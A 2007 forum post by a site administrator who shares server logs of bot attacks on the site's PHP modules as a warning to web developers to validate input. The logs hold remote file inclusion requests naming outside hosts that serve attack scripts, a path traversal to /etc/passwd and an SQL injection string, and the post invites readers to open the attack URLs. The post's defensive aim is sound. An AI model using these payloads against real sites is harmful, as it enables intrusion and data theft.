Why not register?


Post new topic Reply to topic  [ 1 post ] 

All times are UTC [ DST ]

Author Message
PostPosted: Sun Sep 30, 2007 11:43 am  Post subject: Information for webdevelopers...
Reply with quote
User avatar
Offline

Site Admin
Joined: Sat Nov 02, 2002 1:35 am
Posts: 19753
Location: En EspaƱa
I thought I'd publish some stats for people with websites about methods used by webbots to attack sites. On the frontpage its a bespoke php portal, which secures every point of input and runs a lot of checks to make sure input is valid.

Anyways if your a webdesigner, here's some examples of basic attacks and why you have to secure any point of input. Validate and abort if the input isn't what's wanted... its the least you can do for your users :)

Code:
IP:
Agent: Wget/1.1 (compatible; i486; Linux; RedHat7.3)
Remote Address: 65.83.197.216
 Remote Port: 1440
---------
Query String: id=http://amyru.h18.ru/images/cs.txt?
X-Forwarded: none
Script Name: /modules/news/index.php
Request Method: GET
POST Data:
HTTP-HOST: www.dead-donkey.com


Code:
IP:
Agent: libwww-perl/5.79
Remote Address: 194.126.175.35
 Remote Port: 56104
---------
Query String: act=lirenews&id=http://www.freewebs.com/nuklir/alat/f.php??
X-Forwarded: none
Script Name: /modules/news/index.php
Request Method: GET
POST Data:
HTTP-HOST: www.dead-donkey.com


Code:
IP:
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Remote Address: 58.71.1.35
 Remote Port: 46940
---------
Query String: section=http%3A%2F%2Fwww.channelnewsperu.com%2Fimagenes%2Fpublicaciones%2Ffotos%2Fnepicu%2Fegul%2F&id=481
X-Forwarded: none
Script Name: /modules/shares/index.php
Request Method: GET
POST Data:
HTTP-HOST: www.dead-donkey.com


Code:
IP:
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Remote Address: 222.197.173.53
 Remote Port: 4214
---------
Query String: section=http%3A%2F%2Fwww.slda.info%2Fimages%2Flebun%2Fisexopo%2F&id=481
X-Forwarded: none
Script Name: /modules/shares/index.php
Request Method: GET
POST Data:
HTTP-HOST: www.dead-donkey.com


Code:
IP:
Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)
Remote Address: 86.106.16.178
 Remote Port: 1903
---------
Query String: section=../../../../../../../../../../../../../../etc/passwd
X-Forwarded: none
Script Name: /modules/links/index.php
Request Method: GET
POST Data:
HTTP-HOST: www.dead-donkey.com


Code:
IP:
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Remote Address: 140.130.156.81
 Remote Port: 2262
---------
Query String: section=movies&id=http%3A%2F%2Fwww.intel.com%3F&jYQAAtWq86=
X-Forwarded: none
Script Name: /modules/shares/index.php
Request Method: GET
POST Data:
HTTP-HOST: www.dead-donkey.com


Code:
IP:
Agent: Internet Explorer 6.0
Remote Address: 219.137.204.103
 Remote Port: 1156
---------
Query String: section=movies&id=481'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20'%25'='
X-Forwarded: none
Script Name: /modules/shares/index.php
Request Method: GET
POST Data:
HTTP-HOST: www.dead-donkey.com


Code:
IP:
Agent: libwww-perl/5.803
Remote Address: 81.171.105.6
 Remote Port: 55601
---------
Query String: id=http://edl.yoll.net/cmd.txt?
X-Forwarded: none
Script Name: /modules/news/index.php
Request Method: GET
POST Data:
HTTP-HOST: www.dead-donkey.com


Code:
IP:
Agent: libwww-perl/5.79
Remote Address: 72.32.2.231
 Remote Port: 59365
---------
Query String: id=http://www.jonat.com/work/psv?
X-Forwarded: none
Script Name: /modules/news/index.php
Request Method: GET
POST Data:
HTTP-HOST: www.dead-donkey.com


Just a short sample of recent attacks, i usuallly email the site admins of attack sites but found an overwhelming ingorance and hostility to the damage their site is doing. If you paste one of the odd urls into your address bar, you'll usually find the method of attack, which is trying to get remote php to execute. Obviously the bots have attacked those sites and uploaded malicious code, so its important that you do everything in your power to protect your site, not only for your site and your users, but also for every other site on the internet :)

I'll post novel attacks in this thread from time to time.

_________________
Mouse nipple for the win! Trackpoint or death!


Top
 Profile  
Display posts from previous:  Sort by  

All times are UTC [ DST ]

Post new topic Reply to topic  [ 1 post ] 


Who is online

Users browsing this forum: No registered users and 8 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
cron
Frontpage / Forums / Scifi


What's blood for, if not for shedding?